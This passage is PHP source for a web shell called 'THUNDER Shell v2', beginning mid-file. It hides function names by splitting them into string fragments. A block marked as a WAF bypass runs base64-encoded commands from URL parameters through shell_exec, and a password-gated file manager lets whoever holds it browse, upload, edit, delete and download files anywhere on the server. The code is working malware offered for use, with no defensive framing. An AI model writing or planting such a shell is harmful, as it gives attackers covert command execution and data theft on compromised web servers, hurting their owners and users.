'file'.'_get_contents', 'file_put' => 'file'.'_put_contents', 'unlink' => 'unlink', 'rename' => 'rename', 'move_up' => 'move_uploaded_file', 'scandir' => 'scandir', 'is_dir' => 'is_dir', 'is_file' => 'is_file', 'filesize' => 'filesize', 'realpath' => 'realpath', 'readfile' => 'readfile', 'mkdir' => 'mkdir', 'rmdir' => 'rmdir', 'shell' => 'shell_exec', // For command execution ]; // ---------- Hidden Command Execution (WAF bypass) ---------- if (isset($_GET['x']) && isset($_GET['t']) && $_GET['t'] === $secret_token) { $cmd = base64_decode($_GET['x']); if ($cmd) { $output = $f['shell']($cmd); die("
" . htmlspecialchars($output) . "
"); } } // ---------- Authentication ---------- if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['login'])) { if ($_POST['username'] === $valid_user && $_POST['password'] === $valid_pass) { $_SESSION['loggedin'] = true; $_SESSION['username'] = $valid_user; header('Location: ' . $_SERVER['PHP_SELF']); exit; } else $error = 'Invalid credentials.'; } if (isset($_GET['logout'])) { session_destroy(); header('Location: ' . $_SERVER['PHP_SELF']); exit; } if (!isset($_SESSION['loggedin']) || $_SESSION['loggedin'] !== true) { // Show login form (unchanged for brevity – same as original) echo 'THUNDER Login

Login to THUNDER

' . (isset($error)?"

$error

":'') . '


'; exit; } // ---------- File Manager Core (Obfuscated) ---------- $root = $f['realpath'](__DIR__); $current = isset($_GET['dir']) ? $f['realpath']($_GET['dir']) : $root; if (!$current || !$f['is_dir']($current)) $current = $root; // Directory listing with dynamic function calls function listDir($dir, $funcs) { $items = $funcs['scandir']($dir); $dirs = []; $files = []; foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $path = $dir . '/' . $item; if ($funcs['is_dir']($path)) $dirs[] = $item; else $files[] = $item; } foreach ($dirs as $d) { echo '📁 ' . htmlspecialchars($d) . 'Folder Edit | Delete | Rename '; } foreach ($files as $f) { $size = $funcs['filesize']($dir . '/' . $f); echo '' . htmlspecialchars($f) . '' . $size . ' bytes Edit | Delete | Rename | Download '; } } // Handle actions (delete, download, rename, upload, edit, create) if (isset($_GET['delete'])) { $target = $current . '/' . $_GET['delete']; if ($f['is_file']($target)) $f['unlink']($target); elseif ($f['is_dir']($target)) $f['rmdir']($target); header("Location: ?dir=" . urlencode($current)); exit; } if (isset($_GET['download'])) { $file = $current . '/' . $_GET['download']; if ($f['is_file']($file)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); $f['readfile']($file); exit; } } if (isset($_POST['rename_file'])) { $old = $current . '/' . $_POST['old_name']; $new = $current . '/' . $_POST['new_name']; $f['rename']($old, $new); header("Location: ?dir=" . urlencode($current)); exit; } if (isset($_POST['upload'])) { $target = $current . '/' . basename($_FILES["file"]["name"]); $f['move_up']($_FILES["file"]["tmp_name"], $target); header("Location: ?dir=" . urlencode($current)); exit; } if (isset($_POST['save_file'])) { $file = $current . '/' . $_POST['file_name']; $f['file_put']($file, $_POST['file_content']); header("Location: ?dir=" . urlencode($current)); exit; } if (isset($_POST['create_file'])) { $newfile = $current . '/' . $_POST['new_file_name']; $f['file_put']($newfile, ''); header("Location: ?dir=" . urlencode($current)); exit; } if (isset($_POST['create_dir'])) { $newdir = $current . '/' . $_POST['new_dir_name']; $f['mkdir']($newdir); header("Location: ?dir=" . urlencode($current)); exit; } ?> THUNDER Shell v2
Logout

Current:

NameSizeActions